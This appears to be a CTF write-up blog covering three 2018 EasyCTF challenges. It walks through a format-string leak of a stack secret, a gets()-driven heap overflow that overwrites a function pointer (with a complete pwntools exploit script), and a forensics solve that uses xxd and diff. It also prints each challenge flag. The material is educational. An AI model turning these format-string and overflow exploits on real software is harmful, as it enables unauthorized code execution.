CTF Shell Club

Collection of CTF write ups made with <3.

© 2019. All rights reserved.

EASYCTF - Format

21 Feb 2018

With GDB, we put a breakpoint when the program compare the secret with our input.

0x0000000000400917 <+144>: cmp eax,DWORD PTR [rbp-0x54]

We display the content of the stack with the format string:

Input in GDB :

r < /tmp/f `python2 -c "print 'AAAA%p%p%p%p%p%p%p'*30+'\\nAAAA'" > /tmp/f

Output :

0x6d616e2072756f59(nil)(nil)0x7faa168845000x77(nil)0x1013f249000000000x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x257025702570250xc7ae83a318d60c000x7ffce149c7a00x4009900x7ffce149c8880x1004007800x7ffce149c8800x3e8000000000x4009a00x7faa16302f4a(nil)0x7ffce149c8880x1000400000x40093d(nil)0x8b4728e5db7df7420x4007800x7ffce149c880(nil)(nil)

We look at the content of secret which is at $rbp-0x54 :

x/ga $rbp-0x54 0x702570251013f249

The program compare with eax. So we need to look at the 32 lowest bits of RAX.
So the secret is : 1013f249
We look for the secret in the leak from the format string. The content of secret is on 7th pointer.

We do the same on the server

user44798@shell:/problems/format$ ./format 
Enter your name: %p%p%p%p%p%p%p
Your name is: 0x400a5a0x7ff00014c7800xe0x7ff0003697000xe(nil)0x732581c900000000

Enter your secret password (in hex)
732581c9
easyctf{p3sky_f0rm4t_s7uff}

EASYCTF - Fanfic

21 Feb 2018

Some analysis

The program given is made to write a book chapter by chapter.
When we look at the code we can see that when we edit a chapter that we have already writen :

if (option_val > 0 && option_val <= num_ch) 
{
    printf("Editing chapter\n");      
    printf("Enter new chapter text: \n");         
    curr_ch = fanfic->first_chapter;
    for (i=1; i<option_val; i++) 
    {
        curr_ch = curr_ch->next_chapter;
    }
    gets(curr_ch->content);   
}

Here we can see that the function gets allow us to overflow the size of curr_ch->content.
But the segmentation fault is triggered when we publish the book, because we call the function print_chapter and the content of our chapter is put in the heap.
So if we look at the heap before the call :

0x8c6d9d0:  0x0000000000000000  0x4141414141410000
0x8c6d9e0:  0x4141414141414141  0x4141414141414141
0x8c6d9f0:  0x4141414141414141  0x4141414141414141
0x8c6da00:  0x4141414141414141  0x4141414141414141
0x8c6da10:  0x0000004141414141  0x0000000000000000
0x8c6da20:  0x0000000000000000  0x0000000000000000
0x8c6da30:  0x0000000000000000  0x0000000000000000
0x8c6da40:  0x0000000000000000  0x0000000000000000
0x8c6da50:  0x0000000000000000  0x0000000000000000
0x8c6da60:  0x0000000000000000  0x0000000000000000
0x8c6da70:  0x0000000000000000  0x0000000000000000
0x8c6da80:  0x0000000000000000  0x0000000000000000
0x8c6da90:  0x0000000000000000  0x0000000000000000
0x8c6daa0:  0x0000000000000000  0x0000000000000000
0x8c6dab0:  0x0000000000000000  0x0000000000000000
0x8c6dac0:  0x0000000000000000  0x0000000000000000
0x8c6dad0:  0x0000000000000000  0x0804875f00000000
0x8c6dae0:  0x0000000000000000  0x0002151900000000
0x8c6daf0:  0x0000000000000000  0x0000000000000000
0x8c6db00:  0x0000000000000000  0x0000000000000000
0x8c6db10:  0x0000000000000000  0x0000000000000000
0x8c6db20:  0x0000000000000000  0x0000000000000000

We can see that if we can overflow far enough, we can override the address 0x0804875f which is print_chapter.

gdb-peda$ print print_chapter
$1 = {<text variable, no debug info>} 0x804875f <print_chapter>

Also we know that it’s that address which is call, because the next instructions are :

0x8048dc9 <main+1351>:  mov    eax,DWORD PTR [eax+0x13c]
0x8048dcf <main+1357>:   mov    edx,DWORD PTR ds:0x804b070
0x8048dd5 <main+1363>:   sub    esp,0x8
0x8048dd8 <main+1366>:   push   DWORD PTR [ebp-0xc]
0x8048ddb <main+1369>:   push   edx
0x8048ddc <main+1370>:   call   eax

We see that the content of eax+0x13c is loaded in eax. And is called after that.

gdb-peda$ x/ga $eax+0x13c
0x8c6dadc:  0x804875f <print_chapter>

With calculation or with some tries, we can find that we start overiding the address of print_chapter after a padding of 258

How to exploit

We see that we need to call the function give_flag. But before that we need to call the function validate to change the value of success.

First step : get address from plt

We just do an objdump with grep to obtain the address of validate and give_flag

objdump -D fanfic | grep validate
080487b4 <validate>:
 80487bb:   75 0a                   jne    80487c7 <validate+0x13>
objdump -D fanfic | grep flag                                             
080487ef <give_flag>:
 804881c:   75 43                   jne    8048861 <give_flag+0x72>

Second Step : Call validate function

At this point we know that we need to call the validate function. But the function takes an argument used to change the value of success. We have this comparaison :

void validate(int ans) {
    if ((ans ^ 0xDEADBEEF) == 0xDEADBEAF)

We see that the function need to have 0x40 (64) to pass the test.

If we look at how the print_chapter, we see that the first argument to the function is EDX (0x804b070) and the second is our content of chapter (ebp-0xc). If we look at the C code now, we realize that the first argument is the chapter number (i).
Okay now we have everything for our exploitation.

Third Step : Build the exploit and Enjoy

We know that we need to create at least 65 articles to sucessfully read the content of flag.txt. We have to override the print_chapter function with validate on the 64th chapter and override it with give_flag on the 65th.
In a first time we need to create 65 casual articles and edit the 64th and 65th to override the print_chapter call.

Exploit.py

#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-

from pwn import *


context(arch='i386')
p = 0
b = ELF('./fanfic')

DEBUG = True



def start():
    global p, libc, b
    if p is not 0:
        p.close()
    p = process('/problems/fanfic/fanfic')
    


start()
log.info("Construct ropchain")
ropchain = "A"*258
ropchain += p32(0x080487b4) # validate

ropchain2 = "A"*258
ropchain2 += p32(0x080487ef) # give_flag

p.sendline("lol")

for j in range(1,66):
    p.sendline(str(j))
    p.sendline("lol")
    p.sendline("lol")

p.sendline("1")
p.sendline("64")
p.sendline(ropchain)

p.sendline("1")
p.sendline("65")
p.sendline(ropchain2)

p.recv()
p.sendline("3")
print p.recv()

EASYCTF - Diff

21 Feb 2018

description: Sometimes, the differences matter. Especially between the files in this archive.

category: Forensics

We have 4 binaries, and according to the title, we will have to use the diff command:

xxd file > file_xxd
xxd file2 > file2_xxd
xxd file3 > file3_xxd
xxd file4 > file4_xxd

Now we can diff:

diff file_xxd file2_xxd 
.ELF............
.ELF.....e......		// -> e
................
.........a......		// -> a
.. .............
.. .......s.....		// -> s
.......... .....
................
....yct... .....		// -> yct
......f.........		// -> f
D...............
D......{........		// -> {
................
.......d........		// -> d
................
.......i........		// -> i
.



diff file_xxd file3_xxd 
................
..f.............		// -> f
..`.....|.......
..`.f...|.......		// -> f
................
.....i..........		// -> i
................
.....ni.........		// -> ni
................
......tl........		// -> tl
_r..rela.dyn..re 
_r..rey_.dyn..re 		// -> ????
................
......an_.......		// -> an_
.



diff file_xxd file4_xxd 
................
ez.._problem!}..		// -> ez_problem!}

We have this : easyctf{diffinitl????an_ez_problem!}

On the diff between file and file3, we can easily find the correct keys: easyctf{diffinitly_an_ez_problem!}